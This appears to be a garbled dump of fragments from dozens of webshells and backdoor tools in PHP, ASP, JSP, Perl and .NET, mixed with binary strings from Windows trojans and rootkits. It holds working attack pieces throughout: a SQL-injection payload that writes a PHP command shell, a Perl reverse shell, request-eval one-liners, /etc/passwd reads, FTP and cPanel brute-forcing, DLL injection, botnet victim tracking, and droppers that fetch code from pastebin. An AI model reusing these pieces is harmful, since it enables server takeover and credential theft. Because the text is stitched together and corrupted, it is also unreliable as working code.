type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" 